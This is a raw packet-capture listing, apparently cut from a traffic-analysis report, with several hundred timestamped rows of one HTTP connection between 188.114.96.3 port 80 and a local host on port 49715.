                                Aug 27, 2024 09:49:39.160528898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160535097 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.160548925 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.160563946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160571098 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.160578012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160590887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160604000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160625935 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.160645962 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.160746098 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160757065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160768986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160779953 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160792112 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160801888 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.160804033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160815001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160815001 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.160828114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160840034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.160840988 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.160859108 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.161248922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161259890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161266088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161278963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161290884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161302090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161302090 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.161314011 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161329985 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.161360025 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.161380053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161391020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161401033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161412001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161425114 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.161449909 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.161592960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161604881 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161614895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161628962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161639929 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.161640882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161653042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161664963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161676884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161680937 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.161689043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161703110 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.161714077 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161717892 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.161726952 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161746025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161751032 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.161757946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161770105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161781073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161784887 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.161792994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161811113 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.161828041 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.161933899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161946058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161956072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161967039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161976099 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.161979914 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.161993027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.162004948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.162017107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.162028074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.162033081 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.162039995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.162061930 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.162086964 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.162559986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.162570953 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.162617922 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.236605883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.236674070 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.236685038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.236726046 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.236751080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.236763000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.236793041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.236804962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.236809015 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.236829042 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.236865044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.236876965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.236902952 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.236949921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.236960888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.236989975 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.237010956 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237021923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237034082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237045050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237054110 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.237055063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237075090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237086058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237088919 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.237097025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237103939 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.237109900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237122059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237128973 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.237134933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237150908 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.237181902 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.237288952 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237299919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237309933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237320900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237333059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237349033 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.237360001 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.237421989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237432957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237443924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237456083 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237468958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237477064 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.237478971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237493038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237499952 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.237504005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237514973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237519026 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.237528086 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237539053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237539053 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.237550974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237552881 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.237560987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237571955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237579107 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.237585068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237596035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237597942 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.237618923 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.237709999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237721920 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237730980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237744093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237756014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237767935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237768888 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.237778902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237791061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237793922 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.237802982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237814903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237824917 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237828016 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.237835884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237854958 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.237916946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237929106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.237973928 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.238075972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238086939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238095999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238106966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238121033 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.238123894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238135099 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.238136053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238147020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238158941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238159895 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.238171101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238182068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238187075 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.238193989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238200903 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.238204956 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238217115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238228083 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238234997 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.238240957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238251925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238257885 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.238265991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238276958 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.238279104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238291025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238301992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238307953 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.238326073 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.238526106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238539934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238549948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238564968 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238574982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238576889 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.238585949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238596916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238600016 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.238607883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238620043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238625050 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.238636971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238646984 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.238650084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238660097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238672018 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.238672972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238682985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238687038 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.238698006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238707066 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.238708973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238715887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238727093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238743067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238750935 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.238756895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238775015 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.238790989 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.238810062 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.239012957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.239023924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.239032984 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.239044905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.239059925 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.239062071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.239073992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.239084959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.239092112 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.239097118 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.239109039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.239109993 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.239120007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.239130974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.239141941 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.239144087 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.239156008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.239165068 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.239166021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.239181995 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.239202976 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.239381075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.239392042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.239402056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.239413023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.239423990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.239429951 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.239438057 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.239451885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.239459991 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.239464045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.239478111 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.239492893 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.323524952 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.323627949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.323637962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.323647976 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.323664904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.323682070 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.323693991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.323704958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.323713064 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.323715925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.323725939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.323734045 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.323756933 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.323776007 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.323791981 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.323805094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.323817015 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.323831081 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.323851109 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.323868990 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.323928118 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.323939085 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.323949099 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.323961020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.323972940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.323985100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.323990107 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.323997021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324001074 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.324027061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324027061 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.324038029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324048996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324058056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324065924 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.324086905 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.324201107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324212074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324222088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324239016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324249029 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.324249983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324259996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324273109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324280977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324289083 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.324292898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324304104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324316025 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.324316025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324326992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324331045 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.324337959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324376106 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.324403048 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.324436903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324448109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324457884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324469090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324486017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324516058 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.324635029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324645996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324655056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324666977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324677944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324685097 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.324688911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324700117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324704885 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.324712992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324723005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324734926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324738979 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.324745893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324747086 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.324758053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324763060 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.324769020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324789047 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.324831009 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.324907064 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324918032 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324929953 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324942112 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324951887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324963093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.324975014 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.324997902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325011015 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.325021029 CEST8049715188.114.96.3192.168.2.8
